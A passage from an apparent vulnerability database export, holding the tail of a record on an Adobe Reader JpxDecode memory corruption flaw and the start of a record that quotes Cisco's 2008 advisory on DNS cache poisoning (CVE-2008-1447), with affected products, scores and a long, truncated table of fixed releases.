        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/37757"
          },
          {
            "trust": 2.5,
            "url": "http://www.us-cert.gov/cas/techalerts/ta10-013a.html"
          },
          {
            "trust": 2.5,
            "url": "http://www.securitytracker.com/id?1023446"
          },
          {
            "trust": 2.5,
            "url": "http://www.vupen.com/english/advisories/2010/0103"
          },
          {
            "trust": 2.1,
            "url": "http://www.adobe.com/support/security/bulletins/apsb10-02.html"
          },
          {
            "trust": 2.0,
            "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=836"
          },
          {
            "trust": 1.7,
            "url": "http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html"
          },
          {
            "trust": 1.7,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00009.html"
          },
          {
            "trust": 1.4,
            "url": "http://xforce.iss.net/xforce/xfdb/55553"
          },
          {
            "trust": 1.1,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=554293"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a8255"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2010-0060.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/38138"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/38215"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55553"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/37690/"
          },
          {
            "trust": 0.8,
            "url": "http://www.adobe.com/support/security/advisories/apsa09-07.html"
          },
          {
            "trust": 0.8,
            "url": "http://kb2.adobe.com/cps/532/cpsid_53237.html"
          },
          {
            "trust": 0.8,
            "url": "http://osvdb.org/show/osvdb/60980"
          },
          {
            "trust": 0.8,
            "url": "http://www.symantec.com/connect/blogs/zero-day-xmas-present"
          },
          {
            "trust": 0.8,
            "url": "http://voices.washingtonpost.com/securityfix/2009/12/hackers_target_unpatched_adobe.html"
          },
          {
            "trust": 0.8,
            "url": "http://vrt-sourcefire.blogspot.com/2009/12/this-is-what-happens-when-you-try-to-do.html"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3955"
          },
          {
            "trust": 0.8,
            "url": "http://www.ipa.go.jp/security/ciadr/vul/20100113-adobe.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2010/at100003.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta10-013a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/jvntr-2010-03/"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3955"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa10-013a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.npa.go.jp/cyberpolice/index.html#topics"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/14341"
          },
          {
            "trust": 0.3,
            "url": "http://www.adobe.com"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=991610"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3955"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/),"
          },
          {
            "trust": 0.1,
            "url": "http://www.adobe.com/products/reader/"
          },
          {
            "trust": 0.1,
            "url": "http://labs.idefense.com/intelligence/vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "http://www.vulnhunt.com."
          },
          {
            "trust": 0.1,
            "url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
          },
          {
            "trust": 0.1,
            "url": "http://labs.idefense.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.adobe.com/products/acrobat/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/business_solutions/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/about_secunia_advisories/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          },
          {
            "db": "BID",
            "id": "37757"
          },
          {
            "db": "PACKETSTORM",
            "id": "85088"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#508357",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401",
            "ident": null
          },
          {
            "db": "BID",
            "id": "37757",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "85088",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "83870",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2009-12-15T00:00:00",
            "db": "CERT/CC",
            "id": "VU#508357",
            "ident": null
          },
          {
            "date": "2010-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-41401",
            "ident": null
          },
          {
            "date": "2010-01-12T00:00:00",
            "db": "BID",
            "id": "37757",
            "ident": null
          },
          {
            "date": "2010-01-14T02:57:07",
            "db": "PACKETSTORM",
            "id": "85088",
            "ident": null
          },
          {
            "date": "2009-12-15T13:39:57",
            "db": "PACKETSTORM",
            "id": "83870",
            "ident": null
          },
          {
            "date": "2010-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201001-089",
            "ident": null
          },
          {
            "date": "2010-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001016",
            "ident": null
          },
          {
            "date": "2010-01-13T19:30:00.483000",
            "db": "NVD",
            "id": "CVE-2009-3955",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2010-06-18T00:00:00",
            "db": "CERT/CC",
            "id": "VU#508357",
            "ident": null
          },
          {
            "date": "2018-10-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-41401",
            "ident": null
          },
          {
            "date": "2015-03-19T09:27:00",
            "db": "BID",
            "id": "37757",
            "ident": null
          },
          {
            "date": "2011-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201001-089",
            "ident": null
          },
          {
            "date": "2010-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001016",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2009-3955",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "85088"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "Adobe Reader and Acrobat JpxDecode Memory Corruption Vulnerability",
        "sources": [
          {
            "db": "BID",
            "id": "37757"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          }
        ],
        "trust": 0.9
      },
      "type": {
        "_id": null,
        "data": "resource management error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200707-0675

    Vulnerability from variot - Updated: 2026-04-10 22:49

    The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka "DNS Insufficient Socket Entropy Vulnerability" or "the Kaminsky bug.". Deficiencies in the DNS protocol and common DNS implementations facilitate DNS cache poisoning attacks. ISC (Internet Systems Consortiuim) BIND generates cryptographically weak DNS query IDs which could allow a remote attacker to poison DNS caches. In IP NAT filtering in Sun Solaris 10 and OpenSolaris series products, when a DNS server runs NAT, it incorrectly changes the original address of the data packet. When the destination address is a DNS port, it will allow remote attackers to bypass CVE-2008 -1447 security protection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks

    Advisory ID: cisco-sa-20080708-dns

    http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml

    Revision 1.0

    For Public Release 2008 July 08 1800 UTC (GMT)

    Summary

    Multiple Cisco products are vulnerable to DNS cache poisoning attacks due to their use of insufficiently randomized DNS transaction IDs and UDP source ports in the DNS queries that they produce, which may allow an attacker to more easily forge DNS answers that can poison DNS caches.

    To exploit this vulnerability an attacker must be able to cause a vulnerable DNS server to perform recursive DNS queries. Therefore, DNS servers that are only authoritative, or servers where recursion is not allowed, are not affected.

    Cisco has released free software updates that address this vulnerability.

    This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml.

    This security advisory is being published simultaneously with announcements from other affected organizations. Products that process DNS messages with the RD flag set will attempt to answer the question asked on behalf of the client. A product is only affected if using a vulnerable implementation of the DNS protocol, the DNS server functionality for the product is enabled, and the DNS feature for the product is configured to process recursive DNS query messages.

    Vulnerable Products +------------------

    The following Cisco products are capable of acting as DNS servers and have been found to have the DNS implementation weakness that makes some types of DNS cache poisoning attacks more likely to succeed:

    • Cisco IOS Software

      A device that is running Cisco IOS Software will be affected if it is running a vulnerable version and if it is acting as a DNS server.

      All Cisco IOS Software releases that support the DNS server functionality and that have not had their DNS implementation improved are affected. For information about specific fixed versions, please refer to the Software Versions and Fixes section.

      A device that is running Cisco IOS Software is configured to act as a DNS server if the command "ip dns server" is present in the configuration. This command is not enabled by default.

    • Cisco Network Registrar

      All Cisco Network Registrar versions are affected, and DNS services are enabled by default.

      The DNS server on CNR is enabled via the command-line interface (CLI) commands "server dns enable start-on-reboot" or "dns enable start-on-reboot" or via the web management interface in the Servers page by selecting the appropriate "Start," "Stop," or "Reload" button.

    • Cisco Application and Content Networking System

      All Cisco Application and Content Networking System (ACNS) versions are affected; DNS services are disabled by default.

      ACNS is configured to act as a DNS server if the command "dns enable" is present in the configuration.

    • Cisco Global Site Selector Used in Combination with Cisco Network Registrar

      The Cisco Global Site Selector (GSS) is affected when it is used in combination with Cisco Network Registrar software to provide a more complete DNS solution. Fixed software would come in the form of an update of the Cisco Network Registrar software rather than an update of the GSS software.

    Products Confirmed Not Vulnerable +--------------------------------

    Products that do not offer DNS server capabilities are not affected by this vulnerability.

    The Cisco GSS by itself is not affected by this vulnerability. However, it is affected when it is used with Cisco Network Registrar software.

    No other Cisco products are currently known to be affected by these vulnerabilities.

    Details

    The Domain Name System is an integral part of networks that are based on TCP/IP such as the Internet. Simply stated, the Domain Name System is a hierarchical database that contains mappings of hostnames and IP addresses. When handling a query from a DNS client, a DNS server can look into its portion of the global DNS database (if the query is for a portion of the DNS database for which the DNS server is authoritative), or it can relay the query to other DNS servers (if it is configured to do so and if the query is for a portion of the DNS database for which the DNS server is not authoritative.)

    Because of the processing time and bandwidth that is associated with handling a DNS query, most DNS servers locally store responses that are received from other DNS servers. The area where these responses are stored locally is called a "cache." Once a response is stored in a cache, the DNS server can use the locally stored response for a certain time (called the "time to live") before having to query DNS servers again to refresh the local (cached) copy of the response. For example, if www.example.com is mapped to the IP address 192.168.0.1 and this mapping is present in the cache of a DNS server, an attacker who succeeds in poisoning the DNS cache of this server may be able to map www.example.com to 10.0.0.1 instead. If this happens, a user who is trying to visit www.example.com may end up contacting the wrong web server. The fundamental implementation weakness is that the DNS transaction ID and source port number used to validate DNS responses are not sufficiently randomized and can easily be predicted, which allows an attacker to create forged responses to DNS queries that will match the expected values. The DNS server will consider such responses to be valid.

    The following Cisco products that offer DNS server functionality have been found to be susceptible to DNS cache poisoning attacks:

    • Cisco IOS Software: The vulnerability documented in Cisco bug ID CSCso81854.

    • Cisco Network Registrar: The vulnerability documented in Cisco bug ID CSCsq01298.

    • Cisco Application and Content Networking System (ACNS): The vulnerability documented in Cisco bug ID CSCsq21930.

    This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1447.

    Vulnerability Scoring Details +----------------------------

    Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

    CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

    Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

    Cisco has provided an FAQ to answer additional questions regarding CVSS at

    http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

    Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at

    http://intellishield.cisco.com/security/alertmanager/cvss

    Cisco Bugs:

    • DNS cache prone to poisoning/forged answers attacks (CSCsq21930)

    • DNS susceptible to forged query response attacks (CSCsq01298)

    • Need to make DNS implementation more resilient against forged answers (CSCso81854)

    CVSS Base Score - 6.4 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - Partial Availability Impact - Partial

    CVSS Temporal Score - 5.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed

    (same score for the three Cisco bugs listed above.)

    Impact

    Successful exploitation of the vulnerability described in this document may result in invalid hostname-to-IP address mappings in the cache of an affected DNS server. This may lead users of this DNS server to contact the wrong provider of network services. The ultimate impact varies greatly, ranging from a simple denial of service (for example, making www.example.com resolve to 127.0.0.1) to phishing and financial fraud.

    Software Versions and Fixes

    When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

    In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

    Cisco IOS Software +-----------------

    Each row of the Cisco IOS Software table (below) names a Cisco IOS Software release train. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. The "Recommended Release" column indicates the releases which have fixes for all the published vulnerabilities at the time of this Advisory. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" column of the table.

    +----------------------------------------+ | Major | Availability of | | Release | Repaired Releases | |------------+---------------------------| | Affected | First Fixed | Recommended | | 12.0-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | 12.0 | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)DB | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0DB | release | | | | 12.0(7)DB | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)DC | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0DC | release | | | | 12.0(7)DC | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0S | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0ST | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.0T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.0W | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0WC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.0WT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.0(7)XE1 | | | | are | | | 12.0XE | vulnerable, | | | | release | | | | 12.0(7)XE1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.0XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)XK2 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0XK | release | | | | 12.0(7)XK2 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)XR1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0XR | release | | | | 12.0(7)XR1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.1-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.1 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.1AA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1AX | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(22)AY1 | | | | are | | | 12.1AY | vulnerable, | 12.1(22) | | | release | EA11 | | | 12.1(22)AY1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1AZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1CX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(4)DB1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1DB | release | | | | 12.1(4)DB1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(4)DC2 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1DC | release | | | | 12.1(4)DC2 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.1E | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(11)EA1 | | | | are | | | 12.1EA | vulnerable, | 12.1(22) | | | release | EA11 | | | 12.1(11)EA1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1EB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EW | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.1(8a)EX | | | | are | | | 12.1EX | vulnerable, | | | | release | | | | 12.1(8a)EX | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1EY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1GA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1GB | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.1T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.1XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(1)XC1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1XC | release | | | | 12.1(1)XC1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.1XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.1(5)YE1 | | | | are | 12.4(19a) | | 12.1YE | vulnerable, | | | | release | 12.4(19b) | | | 12.1(5)YE1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1YF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.2-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2B | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2BC | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2BW | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.2(8)BY | | | | are | | | | vulnerable, | 12.4(19a) | | 12.2BY | release | | | | 12.2(8)BY | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.2BZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CZ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.2DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2DD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2DX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EWA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2MB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2MC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2S | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SBC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SCA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SED | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SGA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.2(8) | | | | TPC10d are | | | | vulnerable, | | | 12.2TPC | release | | | | 12.2(8) | | | | TPC10d and | | | | later are | | | | not | | | | vulnerable; | | |------------+-------------+-------------| | 12.2UZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | 